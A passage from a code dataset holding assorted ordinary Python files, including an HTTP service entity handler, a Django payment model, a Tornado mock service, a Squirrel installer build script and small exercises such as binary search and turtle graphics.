parsed_data_pattern) - len(args)\n zipped_list = zip([list(i)\n for i in parsed_data_pattern], args)\n tmp_list = [list(i) for i in zipped_list]\n new_list = []\n for i in tmp_list:\n i[0][1] = i[1]\n new_list.append(i[0])\n data = urllib.urlencode(prepare_url_dict(new_list), 1)\n if number_of_args_difference:\n data += '&' + \\\n urllib.urlencode(prepare_url_dict(\n parsed_data_pattern[\n -number_of_args_difference:]), 1)\n else:\n data = data_pattern\n\n if kwargs:\n decode_str = lambda x: (type(\n x) == str) and x.decode(\"utf8\") or unicode(x)\n keyword_sub_pattern = u\"=[\\u4e00-\\u9fa5/%A-Za-z0-9_.-]*(?=&)?\"\n for k in kwargs:\n if not re.search(k + keyword_sub_pattern, data):\n raise KeyError('kwargs does not exists!')\n data = encode_str(re.sub(k + keyword_sub_pattern,\n k + '=' + decode_str(kwargs[k]),\n decode_str(data)))\n\n return data\n\n def handle_dict_data_pattern():\n if kwargs:\n for k in kwargs:\n node, key = entity.get_json_value_by_node_key(k)\n value = copy.copy((kwargs[k]))\n if value is None:\n handle_item_in_json(data_pattern, node,\n key, mode='pop_key')\n else:\n handle_item_in_json(data_pattern, node,\n key, values=value, mode='set')\n if args:\n raise Exception('*args is not supported now!')\n\n data = data_pattern\n\n return data\n\n def transform_data_pattern_to_json(temp_data_pattern):\n try:\n temp_data_pattern = json.loads(temp_data_pattern)\n except ValueError:\n return False\n return temp_data_pattern\n\n if isinstance(data_pattern, (str, unicode)):\n data_pattern = handle_str_fake(data_pattern)\n tmp_data_pattern = transform_data_pattern_to_json(\n data_pattern)\n if tmp_data_pattern:\n data_pattern = tmp_data_pattern\n data = handle_dict_data_pattern()\n else:\n data = handle_str_data_patten()\n elif isinstance(data_pattern, dict):\n data_pattern = handle_str_fake(json.dumps(data_pattern))\n data_pattern = json.loads(data_pattern)\n data = handle_dict_data_pattern()\n\n entity._data = data\n else:\n raise ValueError('_current_data_pattern is not properly set')\n\n return func(entity, *args, **kwargs)\n\n return wrapper\n\n\nclass EntityMetaClass(type):\n def __new__(cls, name, bases, attrs):\n attrs['utility'] = Utility()\n return super(EntityMetaClass, cls).__new__(cls, name, bases, attrs)\n\n def __call__(cls, *args, **kwargs):\n cls._service_helper = kwargs.has_key('service_helper') and \\\n kwargs['service_helper'] or ServiceHelperSingleton()\n\n [kwargs.pop(key) for key in ('service_helper',) if kwargs.has_key(key)]\n return super(EntityMetaClass, cls).__call__(*args, **kwargs)\n\n\nclass BasicTroopServiceEntityHandler(object):\n current_data_pattern = ''\n _special_node_attributes = []\n _special_key_attributes = []\n\n __metaclass__ = EntityMetaClass\n\n def __init__(self, url_string=None, data='', has_data_pattern=True,\n files=None, method_type='get',\n request_content_type='form', domain_name=None, cookies=None,\n token=None, stream=False, request_headers=None):\n self._url_string = url_string\n self._data = data\n self._has_data_pattern = has_data_pattern\n self._current_data_pattern = None\n self._request_content_type = request_content_type\n self._domain_name = domain_name\n self._method_type = method_type\n self._files = files\n self._default_url_pattern = url_string\n self._default_data = data\n self._default_request_content_type = request_content_type\n self._default_method_type = method_type\n self._json_content = None\n self._response = None\n self.cookies = cookies\n self.token = token\n self.stream = False\n self._request_headers = request_headers\n # 将类变量赋给实例变量\n self.service_helper = self._service_helper\n\n @property\n def json_content(self):\n return self._json_content\n\n @property\n def response_content(self):\n if not self._response:\n self._get_json_content()\n\n return self._response\n\n @property\n def current_data_pattern(self):\n return self._current_data_pattern\n\n def _refresh_default_args(self, **kwargs):\n for key, value in kwargs.iteritems():\n setattr(self, key, value)\n\n def _get_json_content(self):\n if self._method_type == 'post':\n self._response = self.service_helper.call_service_with_post(\n self._url_string, self._data,\n content_type=self._request_content_type,\n domain_name=self._domain_name, cookies=self.cookies,\n token=self.token, request_headers=self._request_headers)\n elif self._method_type == 'get':\n self._response = self.service_helper.call_service_with_get(\n self._url_string, self._data,\n domain_name=self._domain_name, cookies=self.cookies,\n token=self.token, stream=self.stream, request_headers=self._request_headers)\n elif self._method_type == 'put':\n self._response = self.service_helper.call_service_with_put(\n self._url_string, self._data,\n content_type=self._request_content_type,\n domain_name=self._domain_name, cookies=self.cookies,\n token=self.token, request_headers=self._request_headers)\n elif self._method_type == 'multipart_post':\n self._response = self.service_helper.call_service_with_multipart_post(\n self._url_string, self._data,\n self._files, domain_name=self._domain_name,\n cookies=self.cookies, token=self.token, request_headers=self._request_headers)\n elif self._method_type == 'delete':\n self._response = self.service_helper.call_service_with_delete(\n self._url_string, self._data,\n domain_name=self._domain_name, cookies=self.cookies,\n token=self.token, request_headers=self._request_headers)\n\n try:\n self._json_content = self._response.json()\n except ValueError:\n pass\n\n self.verify()\n\n self.cookies = self._response.cookies\n\n def _reload(self):\n self._url_string, self._data, self._method_type = \\\n self._default_url_pattern, self._default_data, self._default_method_type\n\n self._get_json_content()\n\n def _set_data_pattern(self, *args, **kwargs):\n raise NotImplementedError(\n \"Please override '_set_data_pattern' to set _current_data_pattern for request data\")\n\n def __getattr__(self, attribute):\n \"\"\"\n The method can help to get the entity attribute value in json object.\n And no declaration is needed in the entity.\n There are some requirements have to meet for the attribute name:\n i. the name should be combined with 'node name'+'_'+'key name' of the attribute in json object;\n ii. if 'node name' includes '_', the attribute name has to be added in special_node_attributes.\n iii. if 'key name' includes '_', the attribute name has to be added in special_key_attributes.\n :param attribute: the attribute name\n :return: the value which is corresponding to the given attribute name in json object.\n \"\"\"\n if not (self._response or self._json_content):\n self._get_json_content()\n\n values = []\n node, key = self.get_json_value_by_node_key(attribute)\n handle_item_in_json(self._json_content, node, key, values)\n\n if len(values) == 1:\n values = values.pop()\n\n return values\n\n def update_partial_query_data(self, partial_query_data):\n self._data = self._default_data + partial_query_data\n self._get_json_content()\n\n return self\n\n def verify(self):\n url_string = self._url_string % (\n self._domain_name or Global.SESSION['current_domain_name'])\n if str(self.result) in (\"error\", \"failed\") or str(self.ajaxResult) in (\n \"error\", \"failed\"):\n error_message = self.apiReturn_ValidationError or self.apiReturn_ErrorMessage or self.errors \\\n or self.ErrorMessage or self.ajaxErrors\n if isinstance(error_message, list) and len(error_message) == 1:\n error_message = error_message.pop()\n content_apiReturn = hasattr(self,\n 'content_apiReturn') and self.content_apiReturn or {}\n raise BorrowerResponseException(url_string, error_message,\n self.result, content_apiReturn)\n\n if str(self.result) == \"NG\":\n raise LenderResponseException(url_string, self.message, self.result)\n elif self.code and self.code not in (200, '103', '101'):\n raise LenderResponseException(url_string,\n self.errors or self.message,\n self.result)\n elif self.returnCode and self.returnCode not in ('000000',):\n raise Exception('service on error! path: %s, error_code: %s'\n % (str(self._url_string), self.returnCode))\n\n @set_request_data_from_args\n def send_request(self, *args, **kwargs):\n self._get_json_content()\n\n def get(self):\n self._get_json_content()\n return self\n\n def get_json_value_by_node_key(self, attribute):\n if attribute in self._special_node_attributes:\n node, key = attribute, None\n elif attribute in self._special_key_attributes:\n raw_list = attribute.split('_')\n node, key = raw_list[0], '_' + raw_list[1]\n else:\n raw_list = attribute.split('_')\n if len(raw_list) == 1:\n node, key = attribute, None\n elif len(raw_list) == 2:\n node, key = raw_list[0], raw_list[1]\n else:\n raise Exception(\n '''The attribute, named: %s, don't suitable for getting in this way.''' % attribute)\n return node, key\n","sub_path":"common/basic_troop_service_entity_handler.py","file_name":"basic_troop_service_entity_handler.py","file_ext":"py","file_size_in_byte":15401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"447550548","text":"import redis\n\nujjwal = \"True\"\n\nred_conf={\n'host': 'localhost',\n'port':'6379',\n'db':0\n}\n\n\nMail_classifier_api = \"http://<servername>:10101/classifier/v1/classify\"\nCz_sentiment_api = \"http://server IP:port/sentiment/v1/analyzer\"\n\nr_queue = \"cz_assist_que\" \n#write_quue=\n\"\"\"\nclass conn(self,host,port,db):\n def __init__():\n host = self.host\n port = self.port\n db = self.db\n initialize_con()\n def initialize_con(self):\n conn = redis.Redis(host=host,port=port,db=db,encoding=utf8,retry_on_timeout=True)\n return conn\n\n def re_initialize_con(self):\n\"\"\"\n","sub_path":"setting.py","file_name":"setting.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"196888476","text":"\"\"\"empty message\n\nRevision ID: 4bfa35538a26\nRevises: 5e85166e9a6e\nCreate Date: 2020-10-15 17:33:37.523202\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\n# revision identifiers, used by Alembic.\nrevision = '4bfa35538a26'\ndown_revision = '5e85166e9a6e'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_index('phone', table_name='user')\n op.drop_column('user', 'role')\n op.drop_column('user', 'phone')\n op.drop_column('user', 'last_name')\n op.drop_column('user', 'gender')\n op.drop_column('user', 'name')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('user', sa.Column('name', mysql.VARCHAR(length=120), nullable=False))\n op.add_column('user', sa.Column('gender', mysql.INTEGER(), autoincrement=False, nullable=False))\n op.add_column('user', sa.Column('last_name', mysql.VARCHAR(length=120), nullable=False))\n op.add_column('user', sa.Column('phone', mysql.INTEGER(), autoincrement=False, nullable=True))\n op.add_column('user', sa.Column('role', mysql.INTEGER(), autoincrement=False, nullable=False))\n op.create_index('phone', 'user', ['phone'], unique=True)\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/4bfa35538a26_.py","file_name":"4bfa35538a26_.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"115815405","text":"import collections\nimport re\nimport urlparse\n\nfrom tornado.web import Application, HTTPError, RequestHandler\n\n\nclass MockService(object):\n\n def __init__(self, ioloop, port):\n self.ioloop = ioloop\n self.port = port\n self.host = \"localhost:{0}\".format(port)\n self.protocol = \"http\"\n self.base_url = \"http://\" + self.host\n self.routes = {}\n self._listening = False\n\n def url(self, path):\n return urlparse.urljoin(self.base_url, path)\n\n def listen(self):\n # this is a bit annoying for the end user, but it's better than\n # \"magically\" starting the service, potentially before the user\n # has finished populating routes (or alternatively never starting)\n\n if not self.routes.items():\n # making a 'catchall', since without routes Tornado infinitely\n # redirects. this is only really useful for mocking without\n # testing responses (which is sketchy anyway...)\n handler = self.add_method(\"GET\", \"/(.*)\", _unimplemented)\n handler.add_method(\"POST\", _unimplemented)\n handler.add_method(\"PUT\", _unimplemented)\n handler.add_method(\"OPTIONS\", _unimplemented)\n handler.add_method(\"INFO\", _unimplemented)\n\n application = Application(self.routes.items())\n application.listen(self.port, io_loop=self.ioloop)\n self._listening = True\n\n def add_method(self, method, route, method_handler):\n # this only works with text (not regex) routes, but it's a helper\n # anyway so deal with it. :)\n handler = self.routes.setdefault(route, build_handler(route))\n handler.add_method(method, method_handler)\n return handler\n\n def assert_requested(self, method, path, headers=None):\n headers = headers or {}\n for handler in self.routes.values():\n if handler.route.match(path):\n try:\n handler.assert_requested(method, path, headers)\n except AssertionError:\n continue\n return\n raise AssertionError(\"No request matched: {} {}\".format(method, path))\n\n\nclass MockServiceMethods():\n\n def get(self, *args, **kwargs):\n return self._handle_method(\"GET\", args, kwargs)\n\n def put(self, *args, **kwargs):\n return self._handle_method(\"PUT\", args, kwargs)\n\n def post(self, *args, **kwargs):\n return self._handle_method(\"POST\", args, kwargs)\n\n def options(self, *args, **kwargs):\n return self._handle_method(\"OPTIONS\", args, kwargs)\n\n def info(self, *args, **kwargs):\n return self._handle_method(\"INFO\", args, kwargs)\n\n def _handle_method(self, method, args, kwargs):\n request = _Request(method, self.request.path, self.request.headers)\n self.requests.append(request)\n if method not in self.method_handlers:\n raise HTTPError(405, \"Method '{}' has no handler.\".format(method))\n return self.method_handlers[method](self, *args, **kwargs)\n\n @classmethod\n def add_method(cls, method, handler):\n cls.method_handlers[method.upper()] = handler\n\n @classmethod\n def assert_requested(cls, method, path, headers):\n for request in cls.requests:\n if not request.method == method:\n continue\n if not request.path == path:\n continue\n if not compare_dicts(\n headers, request.headers, case_insensitive=True):\n continue\n\n if request.method == method and request.path == path:\n return\n raise AssertionError(\"No request matched: {}\".format(method))\n\n\ndef build_handler(handler_route):\n\n if type(handler_route) in (str, unicode):\n handler_route = re.compile(handler_route)\n\n class Handler(MockServiceMethods, RequestHandler):\n route = handler_route\n requests = []\n method_handlers = {}\n\n return Handler\n\n\n_Request = collections.namedtuple(\"Request\", [\"method\", \"path\", \"headers\"])\n\n\ndef _unimplemented(handler, route):\n handler.set_status(501)\n handler.finish(\"UNIMPLEMENTED RESPONSE\")\n\n\ndef compare_dicts(expected, actual, case_insensitive=False):\n if case_insensitive:\n expected = [(k.lower(), v) for k, v in expected.items()]\n actual = [(k.lower(), v) for k, v in actual.items()]\n return set(expected).issubset(actual)\n","sub_path":"tornadomock/mock_service.py","file_name":"mock_service.py","file_ext":"py","file_size_in_byte":4420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"422404652","text":"from django.db import models\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.db.models import signals\nfrom django.dispatch import receiver\nfrom django.conf import settings\nfrom jsonfield import JSONField\n\nfrom .payment_method import PaymentMethod\nfrom .order import Order\nfrom .address import AbstractAddress\n\n__all__ = ['BillingAddress', 'Payment']\n\n\nclass BillingAddress(AbstractAddress):\n class Meta:\n verbose_name = _('billing address')\n verbose_name_plural = _('billing addresses')\n\n payment = models.OneToOneField('Payment', on_delete=models.CASCADE,\n related_name='billing_address',\n verbose_name=_('payment'))\n\n\nclass Payment(models.Model):\n class Meta:\n verbose_name = _('payment')\n verbose_name_plural = _('payments')\n\n created_dt = models.DateTimeField(_('created datetime'), auto_now_add=True)\n user = models.ForeignKey(settings.AUTH_USER_MODEL, null=True, blank=True,\n related_name='payments',\n on_delete=models.SET_NULL, verbose_name=_('user'))\n # \"order\" being null means the payment is of a recharge, but not an order\n order = models.ForeignKey(Order, on_delete=models.CASCADE,\n related_name='payments', verbose_name=_('order'),\n blank=True, null=True)\n amount = models.FloatField(_('Payment|amount'))\n\n TYPE_STANDARD = 'standard'\n TYPE_RECHARGE = 'recharge'\n TYPES = (\n (TYPE_STANDARD, _('PaymentType|standard')),\n (TYPE_RECHARGE, _('PaymentType|recharge')),\n )\n\n type = models.CharField(_('type'), max_length=20,\n choices=TYPES, default=TYPE_STANDARD)\n\n recharged = models.BooleanField(_('Payment|recharged'), default=False)\n\n use_balance = models.BooleanField(_('Payment|use balance'))\n # amount that need to be paid from balance\n amount_from_balance = models.FloatField(_('Payment|amount from balance'),\n default=0.0)\n # amount that actually have been paid from balance\n paid_amount_from_balance = models.FloatField(\n _('Payment|paid amount from balance'), default=0.0)\n\n use_point = models.BooleanField(_('Payment|use point'))\n # amount that need to be paid from point\n amount_from_point = models.FloatField(_('Payment|amount from point'),\n default=0.0)\n # point that actually have been paid\n paid_point = models.IntegerField(_('Payment|paid point'), default=0)\n\n METHODS = (\n (PaymentMethod.PAYPAL, _('PayPal')),\n (PaymentMethod.CREDIT_CARD, _('credit card'))\n )\n\n method = models.CharField(_('Payment|method'), null=True, blank=True,\n max_length=20, choices=METHODS)\n vendor_payment_id = models.CharField(_('Payment|vendor payment ID'),\n null=True, blank=True, max_length=100)\n extra_info = JSONField(_('extra information'), default={}, blank=True)\n\n STATUS_PENDING = 'pending'\n STATUS_CLOSED = 'closed'\n STATUS_FAILED = 'failed'\n STATUS_SUCCEEDED = 'succeeded'\n\n STATUSES = (\n (STATUS_PENDING, _('PaymentStatus|pending')),\n (STATUS_CLOSED, _('PaymentStatus|closed')),\n (STATUS_FAILED, _('PaymentStatus|failed')),\n (STATUS_SUCCEEDED, _('PaymentStatus|succeeded')),\n )\n\n status = models.CharField(_('status'), max_length=20, choices=STATUSES,\n default=STATUS_PENDING)\n\n @staticmethod\n def status_changed(old_obj, new_obj):\n if new_obj.type == Payment.TYPE_STANDARD \\\n and new_obj.status in (Payment.STATUS_CLOSED,\n Payment.STATUS_FAILED):\n # payment closed or failed, refund paid balance and point\n new_obj.user.info.increase_point(new_obj.paid_point)\n new_obj.user.info.increase_balance(\n new_obj.paid_amount_from_balance)\n\n # clean payment object, in case of duplicated refund\n new_obj.paid_point = 0\n new_obj.paid_amount_from_balance = 0.0\n\n if new_obj.type == Payment.TYPE_RECHARGE \\\n and new_obj.status == Payment.STATUS_SUCCEEDED \\\n and not new_obj.recharged:\n # payment succeeded, increase the balance\n new_obj.user.info.increase_balance(new_obj.amount)\n new_obj.recharged = True\n\n def __str__(self):\n return _('Payment #%(pk)s') % {'pk': self.pk}\n\n\n@receiver(signals.pre_save, sender=Payment)\ndef payment_pre_save(instance, **kwargs):\n old_instance = None\n if instance.pk:\n old_instance = Payment.objects.get(pk=instance.pk)\n\n if old_instance and old_instance.status != instance.status:\n instance.status_changed(old_instance, instance)\n\n\n@receiver(signals.post_save, sender=Payment)\ndef payment_post_save(instance, **kwargs):\n # put this code in post_save is because that\n # the order should notify user and staffs after becoming \"paid\",\n # and that notification needs the payment object related to the order,\n # which means the payment with status \"succeeded\" must be save first\n if instance.type == Payment.TYPE_STANDARD \\\n and instance.status == Payment.STATUS_SUCCEEDED \\\n and instance.order.status == Order.STATUS_UNPAID:\n # payment succeeded, mark the order as paid\n instance.order.status = Order.STATUS_PAID\n instance.order.paid_amount = instance.amount\n instance.order.save()\n","sub_path":"milove/shop/models/payment.py","file_name":"payment.py","file_ext":"py","file_size_in_byte":5639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"538986665","text":"import os\nimport sys\nimport shutil\nimport tempfile\nimport subprocess\nimport http.client\nimport argparse\nimport traceback\nfrom urllib.parse import urlparse\n\nconfig = {\n 'name': \"Else\",\n 'nuspec_path': \"..\\else.nuspec\",\n 'base_path': \"..\\\\Build\\\\\",\n 'version_path': \"..\\\\version.txt\",\n 'release_dir': \"Releases\",\n 'releases_url': 'http://else-app.s3-eu-west-1.amazonaws.com/Releases/',\n 'package_dir': '..\\\\packages'\n}\n\n# determine path to squirrel tools (syncreleases.exe, squirrel.exe, etc):\nfor fname in os.listdir(config['package_dir']):\n if \"squirrel.windows\" in fname:\n config['squirrel_tools_path'] = os.path.join(\n config['package_dir'],\n fname,\n \"tools\"\n )\n\nif 'squirrel_tools_path' not in config:\n raise Exception(\n \"couldn't find squirrel.windows from the Else solution (this should be installed by nuget\"\n )\n# determine path to nuget.exe\nfor fname in os.listdir(config['package_dir']):\n if \"NuGet.CommandLine\" in fname:\n config['nuget_tools_path'] = os.path.join(\n config['package_dir'],\n fname,\n \"tools\"\n )\nif 'nuget_tools_path' not in config:\n raise Exception(\n \"couldn't find NuGet.CommandLine from the Else solution (this should be installed by nuget\"\n )\n\n\ndef get_setup_exe_name():\n \"\"\" determine the final setup.exe name (e.g. else.setup.exe) \"\"\"\n return \"{}.setup.exe\".format(config['name'])\n\n\ndef build_project():\n \"\"\" execute a shell script to build the solution \"\"\"\n print(\"Building solution via msbuild.bat..\")\n result = subprocess.call('build_solution.bat')\n if result:\n raise Exception(\"Failed to build solution\")\n print(\"Successfully built solution\")\n\n\ndef get_project_version():\n \"\"\" Load the project version from config['version_path'] \"\"\"\n f = open(config['version_path'], 'r')\n version = f.read()\n return version\n\n\ndef push_artifacts():\n \"\"\" push artifacts to appveyor \"\"\"\n for fname in os.listdir(config['release_dir']):\n # we want to push these files\n # Else.setup.exe\n # Else-0.0.17-full.nupkg\n # Else-0.0.17-delta.nupkg\n # RELEASES\n if get_project_version() in fname or fname == 'RELEASES' or fname == get_setup_exe_name():\n cmd = [\n 'c:\\\\program files\\\\appveyor\\\\buildagent\\\\appveyor.exe',\n 'PushArtifact',\n os.path.join(config['release_dir'],\n fname)\n ]\n subprocess.call(cmd)\n print(\" \".join(cmd))\n\n\ndef sync_releases():\n \"\"\" pull RELEASES from s3 \"\"\"\n print(\"syncing releases from \" + config['releases_url'])\n releases_uri = config['releases_url'] + \"RELEASES\"\n\n # check if there are any releases currently\n p = urlparse(releases_uri)\n conn = http.client.HTTPConnection(p.netloc)\n conn.request('HEAD', p.path)\n response = conn.getresponse()\n if response.status != 200:\n print(\"RELEASES does not exist, there are no releases to sync\")\n else:\n syncreleases_exe = config['squirrel_tools_path'] + \"\\\\syncreleases.exe\"\n cmd = [\n syncreleases_exe,\n \"-u\",\n config['releases_url'],\n \"-r\",\n config['release_dir']\n ]\n # syncreleases.exe calls Console.Error incorrectly\n # (https://github.com/Squirrel/Squirrel.Windows/blob/master/src/SyncReleases/Program.cs#L72)\n # so we redirect stderr to STDOUT, to ensure appveyor won't fail\n result = subprocess.call(cmd, stderr=subprocess.STDOUT)\n if result:\n raise Exception(\"Failed to sync releases\")\n\n\ndef build_nupkg(tempdir):\n \"\"\" generate a new nuspec (with changed version), and build a .nupkg using nuget.exe \"\"\"\n # check we have the required files\n if not os.path.isfile(config['nuspec_path']):\n print(\"Error: nuspec file not found (expected: {})\".format(config['nuspec_path']))\n return\n if not os.path.isfile(config['version_path']):\n print(\"Error: version file not found (expected: {})\".format(config['version_path']))\n return\n\n # get project version from config file\n config['version'] = get_project_version()\n\n # prepare nuspec\n f = open(config['nuspec_path'], \"r\")\n nuspec_contents = f.read()\n nuspec_contents = nuspec_contents.replace(\"{{version}}\", config['version'])\n\n # make temp build directory and copy nuspec into it\n target_nuspec_path = os.path.join(tempdir, os.path.basename(config['nuspec_path']))\n with open(target_nuspec_path, \"w\") as f:\n f.write(nuspec_contents)\n\n # build nupkg\n print(\"building nupkg..\")\n nuget_exe = config['nuget_tools_path'] + \"\\\\nuget.exe\"\n print(nuget_exe)\n cmd = [\n nuget_exe,\n \"pack\",\n \"-BasePath\",\n config['base_path'],\n \"-OutputDirectory\",\n tempdir,\n target_nuspec_path\n ]\n print(\" \".join(cmd))\n result = subprocess.call(cmd)\n if result:\n raise Exception(\"Failed to create nupkg\")\n\n\ndef build_installer(tempdir):\n \"\"\" releasify \"\"\"\n print(\"building installer..\")\n nupkg_path = os.path.join(tempdir, \"{}.{}.nupkg\".format(config['name'], config['version']))\n squirrel_exe = config['squirrel_tools_path'] + \"\\\\squirrel.exe\"\n cmd = [squirrel_exe, \"--releasify\", nupkg_path, \"--releaseDir\", config['release_dir']]\n result = subprocess.call(cmd)\n if result:\n raise Exception(\"Failed to releasify\")\n\n # rename setup.exe\n source_path = os.path.join(config['release_dir'], \"Setup.exe\")\n dest_path = os.path.join(config['release_dir'], get_setup_exe_name())\n print(\"Renaming {} to {}\".format(os.path.basename(source_path), os.path.basename(dest_path)))\n if os.path.exists(dest_path):\n os.unlink(dest_path)\n os.rename(source_path, dest_path)\n\n\ndef appveyor_build():\n \"\"\" build an installer and push as artifacts to appveyor \"\"\"\n tempdir = tempfile.mkdtemp()\n try:\n build_project()\n build_nupkg(tempdir)\n sync_releases()\n build_installer(tempdir)\n push_artifacts()\n except Exception as e:\n traceback.print_exc()\n finally:\n shutil.rmtree(tempdir)\n\n\ndef local_build():\n \"\"\" build a local installer \"\"\"\n tempdir = tempfile.mkdtemp()\n try:\n build_project()\n build_nupkg(tempdir)\n build_installer(tempdir)\n except Exception as e:\n traceback.print_exc()\n finally:\n shutil.rmtree(tempdir)\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--appveyor\",\n help=\"Automated build with appveyor\",\n action=\"store_true\"\n )\n parser.add_argument(\n \"--local\",\n help=\"Build a local installer\",\n action=\"store_true\"\n )\n\n args = parser.parse_args()\n if args.appveyor:\n appveyor_build()\n elif args.local:\n local_build()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"tools/build_installer.py","file_name":"build_installer.py","file_ext":"py","file_size_in_byte":6975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"539942038","text":"from turtle import *\n\n\ndef platki():\n up()\n fillcolor(\"orangered\")\n begin_fill()\n circle(120)\n left(180)\n circle(120)\n right(90)\n circle(120)\n right(180)\n circle(120)\n end_fill()\n down()\n\n\ndef srodek(ilosc):\n up()\n forward(60)\n down()\n left(90)\n fillcolor(\"yellow\")\n begin_fill()\n circle(60)\n end_fill()\n left(90)\n up()\n forward(60)\n down()\n for i in range(ilosc):\n up()\n forward(60)\n down()\n forward(45)\n right(90)\n fillcolor(\"black\")\n begin_fill()\n circle(15)\n end_fill()\n right(90)\n forward(45)\n up()\n forward(60)\n down()\n right(180)\n right(360/ilosc)\n\n\ndef kwiatek(ilosc):\n platki()\n srodek(ilosc)\n\n\nkwiatek(5)","sub_path":"kwiatek.py","file_name":"kwiatek.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"202930185","text":"'''\r\nCreated on Dec 23, 2018\r\n\r\n@author: K3NN!\r\n'''\r\n'''Binary Search Algorithm using recursion'''\r\n\r\ndata = [307, 530, 346, 396, 468, 502, 282, 513, 486, 447, 540, 371,\r\n 210, 52, 477, 94, 226, 547, 43, 294, 70, 159, 508, 424, 412,\r\n 415, 55, 43, 387, 119, 371, 52, 317, 322, 96, 236, 151, 82, 147,\r\n 424, 548, 225, 134, 544, 495, 498, 80, 210, 219, 130]\r\ndata = sorted(data)\r\n\r\n\r\ndef binarySearch(data, target, low, high):\r\n if low > high:\r\n return False\r\n else:\r\n mid = low + (high - low) // 2\r\n\r\n if target == data[mid]:\r\n return True\r\n elif target < data[mid]:\r\n return binarySearch(data, target, low, mid - 1)\r\n else:\r\n return binarySearch(data, target, mid + 1, high)\r\n\r\n\r\n'''\r\nNon Recursive implementation of binary search'\r\n'''\r\n\r\n\r\ndef binarySearchNR(data, target):\r\n low = 0\r\n high = len(data) - 1 # get the number of items in data\r\n found = False\r\n while low <= high and not found:\r\n mid = (low + high) // 2\r\n\r\n if data[mid] == target:\r\n found = True\r\n else:\r\n if data[mid] < target:\r\n high = mid - 1\r\n elif data[mid] > target:\r\n low = mid + 1\r\n\r\n return found\r\n\r\n\r\nif __name__ == '__main__':\r\n n = len(data) - 1\r\n\r\n print(binarySearch(data, 67, 0, n))\r\n print(binarySearch(data, 371, 0, n))\r\n print(binarySearchNR(data, 67))\r\n print(binarySearchNR(data, 371))\r\n","sub_path":"DataStr/Recursion/binarySearch.py","file_name":"binarySearch.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"164339148","text":"#!/usr/bin/env python\n\nfrom bs4 import BeautifulSoup, SoupStrainer\nfrom re import compile, sub\nfrom collections import defaultdict\nfrom sys import argv\nimport shelve\nfrom pprint import pprint\n\n# Load pre-existing dict if possible.\nshelf_dict = shelve.open('my_shelf')\n\n# Only parse relevant HTML.\nonly_blocks = SoupStrainer('div', class_ = 'messageBlock')\n\n# lxml is more performant than built-in parser.\nsoup = BeautifulSoup(open(argv[1]), 'lxml', parse_only = only_blocks)\n\n# Get all divs that belong to the messageBlock class.\nmessage_blocks = soup.find_all('div', class_ = 'messageBlock')\n\n# If didn't load dict from shelf.\nif not shelf_dict: SHELF_EXISTED = False\nelse: SHELF_EXISTED = True\n\n# If key not in dict, don't throw KeyError and initialize with an empty list value.\nmaster_dict = defaultdict(list)\n\nfor block in message_blocks:\n # Ignore system messages.\n if not block['timestamp']: continue\n # Unix-style timestamp.\n timestamp = int(block['timestamp'])\n # Get all the titles from the other* divs, including otherCont*.\n title = block.find('div', class_ = compile('other'))['title']\n # Get and remove time from title (e.g., title=\"Xi, Cyrus [9:42:54 AM]\").\n time_pattern = compile(r'\\[.+\\]')\n time = time_pattern.search(title).group()[1:-1]\n # The name is what's left.\n name = time_pattern.sub('', title)[:-1]\n # Get the text from all message* (including messageCont*) divs.\n message = block.find('div', class_ = compile('message')).get_text()[:-1]\n message = message.encode('utf-8')\n # Store both time and timestamp, because timestamps are unique and can order.\n master_val_tup = (message, time, timestamp)\n master_dict[name].append(master_val_tup)\n\nmaster_dict = dict(master_dict)\n\n# If had pre-existing dict, merge the two dicts.\nif SHELF_EXISTED:\n keys = set(shelf_dict['my_dict']).union(master_dict)\n no = []\n # Generator expression.\n # Make use of d.get(k, default) functionality.\n master_dict = dict((k, shelf_dict['my_dict'].get(k, no) + master_dict.get(k, no)) for k in keys)\n \n# Pretty print.\npprint(master_dict)\n\n# Update shelf.\nshelf_dict['my_dict'] = master_dict\nshelf_dict.close()\n","sub_path":"parse_transcript.py","file_name":"parse_transcript.py","file_ext":"py","file_size_in_byte":2183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"284938544","text":"import time\r\nfrom threading import Thread\r\nimport threading\r\n\r\ndef somework(x):\r\n print(threading.current_thread().name)\r\n print(\"started\", x)\r\n time.sleep(3)\r\n print(\"done\", x)\r\n \r\n \r\n#for i in range(5):\r\n# somework(i) #sync\r\nsomework(100)\r\n\r\nfor i in range(5):\r\n t = Thread(target=somework, name='Thread-' + str(i), args=(i,))\r\n t.start() #async\r\n \r\n \r\n","sub_path":"progs/thread1.py","file_name":"thread1.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"44187131","text":"\n'''\nhttps://www.hackerrank.com/challenges/simple-array-sum\n \nSimple Array Sum\n \nGiven an array of $N$ integers, can you find the sum of its elements?Input FormatThe first line contains an integer, $N$, denoting the size of the array. \nThe second line contains $N$ space-separated integers representing the array's elements. Output FormatPrint the sum of the array's elements as a single integer. Sample Input6\n1 2 3 4 